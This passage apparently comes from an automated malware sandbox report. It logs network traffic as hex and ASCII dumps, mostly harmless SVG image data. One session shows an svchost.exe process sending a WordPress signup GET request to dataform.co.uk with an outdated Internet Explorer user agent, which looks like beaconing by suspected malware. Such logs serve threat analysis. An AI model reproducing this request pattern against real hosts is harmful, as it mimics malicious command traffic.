2023-03-22 04:45:55 UTC	1931	IN	Data Raw: 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 38 35 2e 36 32 2c 32 36 39 2e 33 39 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 38 35 2e 37 2c 32 36 30 2e 37 31 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 Data Ascii: 66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M785.62,269.39a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.81,2.81,0,0,1,3.62.19,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M785.7,260.71a2.15,2.15,0,0,1-1.09,2.75,3.15,3.15,0
2023-03-22 04:45:55 UTC	1947	IN	Data Raw: 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 32 30 2e 33 36 2c 33 33 30 2e 34 36 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 36 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 32 30 2e 34 34 2c 33 32 31 2e 37 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 36 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 Data Ascii: ath class="cls-9" d="M820.36,330.46a2.16,2.16,0,0,1-1.09,2.76,3.17,3.17,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M820.44,321.78a2.16,2.16,0,0,1-1.1,2.76,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.7
2023-03-22 04:45:55 UTC	1963	IN	Data Raw: 3d 22 4d 38 35 35 2e 31 2c 33 39 31 2e 35 34 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 35 35 2e 31 37 2c 33 38 32 2e 38 36 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c Data Ascii: ="M855.1,391.54a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M855.17,382.86a2.15,2.15,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,
2023-03-22 04:45:55 UTC	1979	IN	Data Raw: 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 38 39 2e 39 31 2c 34 34 33 2e 39 33 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 33 2e 36 31 2e 32 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 2f 3e 3c Data Ascii: .09,2.75,3.15,3.15,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.64,2.64,0,0,1,0,3.57"/><path class="cls-9" d="M889.91,443.93a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.8-3.58,2.8,2.8,0,0,1,3.61.2,2.64,2.64,0,0,1,0,3.57"/><
2023-03-22 04:45:55 UTC	1995	IN	Data Raw: 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 31 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 31 38 2c 32 36 31 2e 38 39 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c Data Ascii: 6,0,0,1-1.1,2.75,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.8-3.58,2.81,2.81,0,0,1,3.61.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M918,261.89a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,
2023-03-22 04:45:55 UTC	2011	IN	Data Raw: 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 35 32 2e 37 32 2c 33 32 33 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c Data Ascii: 4,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.81,2.81,0,0,1,3.62.19,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M952.72,323a2.15,2.15,0,0,1-1.09,2.75,3.15,3.15,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.81,2.81,0,0,1,3.62.19,2.66,2.66,0,0,1,0,3.58"/><path class="cl
2023-03-22 04:45:55 UTC	2027	IN	Data Raw: 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 2e 38 37 2c 32 36 30 2e 34 31 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 2e 35 38 2c 32 35 31 2e 36 33 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 Data Ascii: 84,2.84,0,0,1,3.66,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M59.87,260.41a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.2,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M59.58,251.63a2.19,2.19,0,0,1-1
2023-03-22 04:45:55 UTC	2043	IN	Data Raw: 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 39 37 2e 33 33 2c 33 31 31 2e 38 37 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d Data Ascii: 18,0,0,1-4.22-1.19,3,3,0,0,1,.65-3.66,2.84,2.84,0,0,1,3.66.05,2.68,2.68,0,0,1,.2,3.61"/><path class="cls-7" d="M97.33,311.87a2.17,2.17,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class=
2023-03-22 04:45:55 UTC	2091	IN	Data Raw: 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 31 37 2e 38 35 2c 31 32 36 2e 36 31 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 31 37 2e 35 36 2c 31 31 37 2e 38 33 61 32 2e 31 39 2c 32 2e 31 39 Data Ascii: 66,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.2,3.61"/><path class="cls-7" d="M117.85,126.61a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67,0,2.67,2.67,0,0,1,.19,3.61"/><path class="cls-7" d="M117.56,117.83a2.19,2.19
2023-03-22 04:45:55 UTC	2107	IN	Data Raw: 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 35 35 2e 36 31 2c 31 38 36 2e 38 36 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 35 35 Data Ascii: -1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M155.61,186.86a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.2,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M155
2023-03-22 04:45:55 UTC	2123	IN	Data Raw: 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 39 33 2e 33 37 2c 32 34 37 2e 31 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 39 33 2e 30 37 2c 32 33 38 2e 33 32 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c Data Ascii: 7,2.67,0,0,1,.19,3.61"/><path class="cls-7" d="M193.37,247.1a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.2,3.61"/><path class="cls-7" d="M193.07,238.32a2.18,2.18,0,0,1-1,2.83,3.18,3.18,
2023-03-22 04:45:55 UTC	2139	IN	Data Raw: 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 33 31 2e 31 32 2c 33 30 37 2e 33 35 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 Data Ascii: -1.19,3,3,0,0,1,.65-3.65,2.84,2.84,0,0,1,3.66,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M231.12,307.35a2.16,2.16,0,0,1-1,2.82,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M2
2023-03-22 04:45:55 UTC	2155	IN	Data Raw: 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 35 31 2e 36 34 2c 31 32 32 2e 30 38 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 Data Ascii: 22-1.19,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M251.64,122.08a2.17,2.17,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="
2023-03-22 04:45:55 UTC	2171	IN	Data Raw: 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 38 39 2e 34 2c 31 38 32 2e 33 33 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d Data Ascii: ,0,1-4.23-1.2,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M289.4,182.33a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2.86,2.86,0,0,1,3.67.05,2.68,2.68,0,0,1,.2,3.61"/><path class=
2023-03-22 04:45:55 UTC	2187	IN	Data Raw: 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 37 2c 32 2e 38 37 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 32 37 2e 31 36 2c 32 34 32 2e 35 37 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f Data Ascii: ,2.83,3.19,3.19,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.66,2.87,2.87,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M327.16,242.57a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/
2023-03-22 04:45:55 UTC	2203	IN	Data Raw: 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 36 34 2e 39 31 2c 33 30 32 2e 38 32 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d Data Ascii: 3.18,0,0,1-4.22-1.2,3,3,0,0,1,.65-3.65,2.84,2.84,0,0,1,3.66,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M364.91,302.82a2.17,2.17,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.2,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class=

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
19	192.168.2.5	53662	83.223.113.46	443	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:45:06 UTC	267	OUT	GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: dataform.co.uk
2023-03-22 04:45:07 UTC	665	IN	HTTP/1.1 200 OK Cache-Control: must-revalidate, no-cache, max-age=0 Keep-Alive: timeout=2, max=100 Content-Length: 48940 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Vary: Accept-Encoding Server: Apache Access-Control-Allow-Headers: mobileappversionnumber, x-requested-with Access-Control-Allow-Origin: * X-Powered-By: PHP/7.0.29 X-UA-Compatible: IE=EmulateIE10 X-Frame-Options: SAMEORIGIN X-Mod-Pagespeed: 1.9.32.14-0 Strict-Transport-Security: max-age=10886400 X-Powered-By: ASP.NET Date: Wed, 22 Mar 2023 04:45:06 GMT Connection: close
2023-03-22 04:45:07 UTC	665	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 36 29 20 7c 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 09 20 20 20 20 3c Data Ascii: <!DOCTYPE html>...[if !(IE 6) \| !(IE 7) \| !(IE 8) ]>...><html lang="en-US" class="no-js">...<![endif]--><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0"> <
